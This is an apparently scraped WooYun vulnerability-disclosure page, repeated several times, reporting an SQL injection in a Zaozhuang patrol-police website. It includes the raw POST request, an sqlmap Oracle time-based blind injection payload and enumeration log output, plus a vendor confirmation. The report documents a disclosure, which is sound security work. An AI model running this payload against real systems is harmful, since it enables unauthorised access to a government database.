枣庄市巡警信息网一处POST注入 | wooyun-2015-0150997| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0150997

漏洞标题：枣庄市巡警信息网一处POST注入

漏洞作者：路人甲

提交时间：2015-11-02 14:32

修复时间：2015-12-18 09:24

公开时间：2015-12-18 09:24

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：5

漏洞状态：已交由第三方合作机构(公安部一所)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-11-02：细节已通知厂商并且等待厂商处理中
2015-11-03：厂商已经确认，细节仅向厂商公开
2015-11-13：细节向核心白帽子及相关领域专家公开
2015-11-23：细节向普通白帽子公开
2015-12-03：细节向实习白帽子公开
2015-12-18：细节向公众公开

简要描述：

详细说明：

**.**.**.**/wscgsxxcx/jszcx.do

POST /wscgsxxcx/jszcx.do HTTP/1.1
Host: **.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:41.0) Gecko/20100101 Firefox/41.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: **.**.**.**/wscgsxxcx/jszcx.do
Cookie: JSESSIONID=0000ZqZcPr54KsQAf1P5SyJMujt:-1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 58
sfzmhm=111111111111111111&dabh=111111111&type=jszcx&state=

漏洞证明：

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: sfzmhm (POST)
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: sfzmhm=111111111111111111' AND 5120=DBMS_PIPE.RECEIVE_MESSAGE(CHR(81)||CHR(115)||CHR(69
)||CHR(120),5) AND 'Utsv'='Utsv&dabh=111111111&type=jszcx&state=
---
[09:38:33] [INFO] the back-end DBMS is Oracle
back-end DBMS: Oracle
[09:38:34] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart
to database names on other DBMSes
[09:38:34] [INFO] fetching database (schema) names
[09:38:34] [INFO] fetching number of databases
[09:38:34] [WARNING] time-based comparison requires larger statistical model, please wait...........
...................
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n]
 Y
[09:38:57] [WARNING] it is very important not to stress the network adapter during usage of time-bas
ed payloads to prevent potential errors
[09:39:04] [INFO] adjusting time delay to 1 second due to good response times
[09:39:06] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '
--no-cast' or switch '--hex'
[09:39:06] [ERROR] unable to retrieve the number of databases
[09:39:06] [INFO] falling back to current database
[09:39:06] [INFO] fetching current database
[09:39:06] [INFO] retrieved: QSWEBCGS_USER
[09:40:07] [WARNING] on Oracle you'll need to use schema names for enumeration as the counterpart to
 database names on other DBMSes
available databases [1]:
[*] QSWEBCGS_USER

09:42:27] [INFO] adding words used on web page to the check list
09:42:29] [INFO] retrieved: CUSTOMER
09:42:37] [INFO] retrieved: CHART
09:42:52] [INFO] retrieved: PUBLISHER
09:42:55] [INFO] retrieved: METADATA
09:42:57] [INFO] retrieved: LOCATIONS
09:43:00] [INFO] retrieved: VIDEO
09:43:03] [INFO] retrieved: PROMOTION
09:43:14] [INFO] retrieved: SIZES
09:43:16] [INFO] retrieved: ADMIN_LOGS
09:43:23] [INFO] retrieved: PMA_HISTORY
09:43:27] [INFO] retrieved: MUCROOMPROP
09:43:30] [INFO] retrieved: DEPENDENT
09:43:34] [INFO] retrieved: STUDENTS
09:43:38] [INFO] retrieved: CLIENTS
09:43:42] [INFO] retrieved: JIVEROSTER
09:43:43] [INFO] retrieved: VOLUME
09:43:50] [INFO] retrieved: OSC_PRODUCTS_TO_CATEGORIES
09:43:59] [INFO] retrieved: MESSAGE_STATUSES
09:44:29] [INFO] retrieved: EZ_WEBSTATS_CONF
09:44:46] [INFO] retrieved: ALLOCATION
09:44:47] [INFO] retrieved: DTB_CATEGORY_TOTAL_COUNT
09:44:50] [INFO] retrieved: PAGECONTENT
09:45:02] [INFO] retrieved: THOT_THEME
09:45:08] [INFO] retrieved: DWE_PREDECESSORS
09:45:11] [INFO] retrieved: PZ
09:45:12] [INFO] retrieved: R1SIZE
09:45:13] [INFO] retrieved: PRICEGROUP
09:45:14] [INFO] retrieved: TBL_TECH
09:45:15] [INFO] retrieved: AUDIT
09:45:16] [INFO] retrieved: COMMAND
09:45:18] [INFO] retrieved: ZIPS
09:45:27] [INFO] retrieved: JOS_COMPONENTS
09:45:31] [INFO] retrieved: TF_MESSAGES
09:45:32] [INFO] retrieved: GEO_LAKE
09:45:34] [INFO] retrieved: USER_PREFERENCES
09:45:36] [INFO] retrieved: CREDENZIALI
09:45:38] [INFO] retrieved: DIV_TREATMENT
09:45:39] [INFO] retrieved: COCKTAIL_PERSON
09:45:39] [INFO] retrieved: CDV_CURATED_ALLELE
09:45:41] [INFO] retrieved: ACCOUNTUSER
09:45:43] [INFO] retrieved: DESCRIPTIONS_LANGUAGES
09:45:44] [INFO] retrieved: NOT_NULL_WITH_DEFAULT_TEST
09:46:26] [INFO] retrieved: DUPTEST
09:46:30] [INFO] retrieved: ADMINS
09:46:49] [INFO] retrieved: CATEGORIES
09:47:01] [INFO] retrieved: QRTZ_JOB_LISTENERS
09:47:03] [INFO] retrieved: REF
09:47:05] [INFO] retrieved: GRAPHS
09:47:18] [INFO] retrieved: DTB_MAIL_HISTORY
09:47:24] [INFO] retrieved: EW_TEMI
09:47:26] [INFO] retrieved: PEER_CONFIG_CHILD_CONFIG
09:47:26] [INFO] retrieved: CMAVAILABLESERVICEBINDING
09:47:29] [INFO] retrieved: IPASSOCS
09:47:31] [INFO] retrieved: CMSYSTEMUSER
09:47:33] [INFO] retrieved: CHANNELITEMS
09:47:37] [INFO] retrieved: WP_COMMENTS
09:48:19] [INFO] retrieved: JOS_VM_SHOPPER_GROUP
09:48:20] [INFO] retrieved: JOS_VM_CURRENCY
09:48:23] [INFO] retrieved: JOS_VM_PRODUCT_DISCOUNT
09:48:31] [INFO] retrieved: JOS_VM_PRODUCT_RELATIONS
09:48:32] [INFO] retrieved: JOS_VM_ORDER_HISTORY
09:48:34] [INFO] retrieved: BLACKLIST
09:48:35] [INFO] retrieved: COST
09:48:40] [INFO] retrieved: CONTACTTYPE
09:48:41] [INFO] retrieved: CONTENT
09:48:48] [INFO] retrieved: ADMINISTRATOR
09:48:49] [INFO] retrieved: ARTICLES
09:48:50] [INFO] retrieved: ARTIKEL
09:48:51] [INFO] retrieved: AUTORE
09:48:55] [INFO] retrieved: DRAGON_USERS
09:49:02] [INFO] retrieved: LOGS
09:49:31] [INFO] retrieved: SURVEYRESPONDENT
09:49:38] [INFO] retrieved: TBLSTONECATEGORY
09:49:40] [INFO] retrieved: CC_INFO
09:49:42] [INFO] retrieved: CMS_ADMIN
09:49:44] [INFO] retrieved: SITELOGIN
09:50:00] [INFO] retrieved: QUANLY
09:50:01] [INFO] retrieved: QUANTRI
09:50:06] [INFO] retrieved: TBLNGUOIDUNGS
09:50:10] [INFO] retrieved: TBL_USERACCOUNTS
09:50:11] [INFO] retrieved: ADMIN_USERID
09:50:15] [INFO] retrieved: USR_PASS
09:50:17] [INFO] retrieved: DBSTUDENTS
09:50:19] [INFO] retrieved: USERPASSWORD
09:50:20] [INFO] retrieved: LASTLOGINDATE
09:50:28] [INFO] retrieved: HERUNTERLADEN
09:50:29] [INFO] retrieved: GLMM
09:50:32] [INFO] retrieved: GLY
09:51:02] [INFO] retrieved: ATTIVITA
09:51:02] [INFO] retrieved: COMUNI
09:51:18] [INFO] retrieved: SGA_XPLAN_TPL_V$SQL
09:51:19] [INFO] retrieved: CONNECTIONS
09:51:22] [INFO] retrieved: GWS_TEXT
09:51:24] [INFO] retrieved: OIL_GOOGLE
09:51:31] [INFO] retrieved: DISCIPLINE_UTENTI
09:51:33] [INFO] retrieved: OIL_STATS_AGENTS
09:51:35] [INFO] retrieved: SPIP_AUTEURS

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：6

确认时间：2015-11-03 09:23

厂商回复：

感谢提交！！
验证确认所描述的问题，已通知其修复。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0150997

漏洞标题：枣庄市巡警信息网一处POST注入

相关厂商：公安部一所

漏洞作者：路人甲

提交时间：2015-11-02 14:32

修复时间：2015-12-18 09:24

公开时间：2015-12-18 09:24

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：5

漏洞状态：已交由第三方合作机构(公安部一所)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0150997

漏洞标题：枣庄市巡警信息网一处POST注入

相关厂商：公安部一所

漏洞作者： 路人甲

提交时间：2015-11-02 14:32

修复时间：2015-12-18 09:24

公开时间：2015-12-18 09:24

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：5

漏洞状态：已交由第三方合作机构(公安部一所)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0150997"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云